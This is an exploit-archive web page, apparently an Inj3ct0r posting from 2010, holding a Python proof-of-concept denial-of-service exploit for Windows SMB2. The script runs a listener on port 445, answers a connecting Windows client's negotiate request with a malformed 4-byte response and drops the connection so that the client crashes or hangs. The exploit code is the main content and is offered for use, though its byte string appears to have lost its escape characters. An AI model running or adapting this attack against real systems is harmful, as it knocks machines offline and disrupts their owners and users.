Home / os / win7

Windows SMB2 Negotiate Protocol (0x72) Response DOS

Posted on 07 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Windows SMB2 Negotiate Protocol (0x72) Response DOS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
Windows SMB2 Negotiate Protocol (0x72) Response DOS
===================================================

#!/usr/bin/python
 
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffi?, i did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
 
import socket,sys,time
 
print &quot;Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600&quot;
print &quot;Written by Jelmer de Hen&quot;
print &quot;Published at http://h.ackack.net/?p=387&quot;
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind((&quot;&quot;, 445))
smb.listen(1)
smbconn, addr = smb.accept()
print &quot;[+] &quot;+str(addr)+&quot; is trying to make connection to us over port 445&quot;
while 1:
    new_packet = smbconn.recv(1024)
    print &quot;[+] Waiting for a negotiate request packet&quot;
    if new_packet[8]==&quot;r&quot;:
        print &quot;[+] Received the negotiate request packet injecting the 4 bytes now...&quot;
        smbconn.send(&quot;x00x00x00x01&quot;)
        break
print &quot;[+] Closing connection... This is part of the exploit&quot;
smbconn.close()
print &quot;[+] Done, if all went good then the box on the other side crashed&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :